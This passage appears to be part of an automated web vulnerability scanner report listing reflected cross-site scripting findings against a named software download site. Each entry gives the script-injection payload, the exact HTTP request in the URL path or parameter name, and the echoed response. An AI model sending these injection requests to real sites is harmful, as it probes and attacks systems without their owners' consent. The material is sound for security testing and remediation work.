GET /downloads/t-64-bit-teamspeak-download-opmulwsy.html75347"><script>alert(1)</script>3f02c20ef7c HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-teamspeak-download-opmulwsy.html75347"><script>alert(1)</script>3f02c20ef7c"/>
...[SNIP]...

1.285. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ade4"><script>alert(1)</script>9b2e7ce64af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-teamspeak-download-opmulwsy.html?2ade4"><script>alert(1)</script>9b2e7ce64af=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-teamspeak-download-opmulwsy.html?2ade4"><script>alert(1)</script>9b2e7ce64af=1"/>
...[SNIP]...

1.286. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15e9e"><script>alert(1)</script>2068dbf1796 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads15e9e"><script>alert(1)</script>2068dbf1796/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:20:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads15e9e"><script>alert(1)</script>2068dbf1796/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html" />
...[SNIP]...

1.287. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e2d1"><script>alert(1)</script>b29de778e85 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html2e2d1"><script>alert(1)</script>b29de778e85 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html2e2d1"><script>alert(1)</script>b29de778e85"/>
...[SNIP]...

1.288. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4317f"><script>alert(1)</script>f5492ba1d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html?4317f"><script>alert(1)</script>f5492ba1d6=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html?4317f"><script>alert(1)</script>f5492ba1d6=1"/>
...[SNIP]...

1.289. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d5a5"><script>alert(1)</script>39fb5dff735 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads9d5a5"><script>alert(1)</script>39fb5dff735/t-64-bit-usenext-download-rizftkeg.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:18:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads9d5a5"><script>alert(1)</script>39fb5dff735/t-64-bit-usenext-download-rizftkeg.html" />
...[SNIP]...

1.290. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c06d"><script>alert(1)</script>7dbfa7985a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-usenext-download-rizftkeg.html4c06d"><script>alert(1)</script>7dbfa7985a0 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-usenext-download-rizftkeg.html4c06d"><script>alert(1)</script>7dbfa7985a0"/>
...[SNIP]...

1.291. http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-usenext-download-rizftkeg.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1902c"><script>alert(1)</script>78f4ba71bdf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-usenext-download-rizftkeg.html?1902c"><script>alert(1)</script>78f4ba71bdf=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

1.292. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f97a2"><script>alert(1)</script>fe238360768 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsf97a2"><script>alert(1)</script>fe238360768/t-64-bit-web-forum-reader-download-ivzgszuq.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:19:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsf97a2"><script>alert(1)</script>fe238360768/t-64-bit-web-forum-reader-download-ivzgszuq.html" />
...[SNIP]...

1.293. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22641"><script>alert(1)</script>a78c23ad14d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html22641"><script>alert(1)</script>a78c23ad14d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html22641"><script>alert(1)</script>a78c23ad14d"/>
...[SNIP]...

1.294. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3401b"><script>alert(1)</script>d76e63f7bc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html?3401b"><script>alert(1)</script>d76e63f7bc9=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html?3401b"><script>alert(1)</script>d76e63f7bc9=1"/>
...[SNIP]...

1.295. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9493"><script>alert(1)</script>26deef30248 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadse9493"><script>alert(1)</script>26deef30248/t-64-bit-web-forum-reader-download-sqifmyiy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:19:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadse9493"><script>alert(1)</script>26deef30248/t-64-bit-web-forum-reader-download-sqifmyiy.html" />
...[SNIP]...

1.296. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f12c"><script>alert(1)</script>5499298239f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html8f12c"><script>alert(1)</script>5499298239f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html8f12c"><script>alert(1)</script>5499298239f"/>
...[SNIP]...

1.297. http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d77d"><script>alert(1)</script>3841192b652 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html?4d77d"><script>alert(1)</script>3841192b652=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html?4d77d"><script>alert(1)</script>3841192b652=1"/>
...[SNIP]...

1.298. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3aef"><script>alert(1)</script>f4e866e47d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsa3aef"><script>alert(1)</script>f4e866e47d1/t-64-bit-windows-live-mail-download-melibvyx.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:22:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsa3aef"><script>alert(1)</script>f4e866e47d1/t-64-bit-windows-live-mail-download-melibvyx.html" />
...[SNIP]...

1.299. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecd4d"><script>alert(1)</script>4b44f8919a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-mail-download-melibvyx.htmlecd4d"><script>alert(1)</script>4b44f8919a7 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-mail-download-melibvyx.htmlecd4d"><script>alert(1)</script>4b44f8919a7"/>
...[SNIP]...

1.300. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-mail-download-melibvyx.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3f31"><script>alert(1)</script>a68db57adbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-live-mail-download-melibvyx.html?b3f31"><script>alert(1)</script>a68db57adbf=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-mail-download-melibvyx.html?b3f31"><script>alert(1)</script>a68db57adbf=1"/>
...[SNIP]...

1.301. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34c74"><script>alert(1)</script>9bb43158f8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads34c74"><script>alert(1)</script>9bb43158f8a/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:20:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads34c74"><script>alert(1)</script>9bb43158f8a/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html" />
...[SNIP]...

1.302. http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html

Issue detail

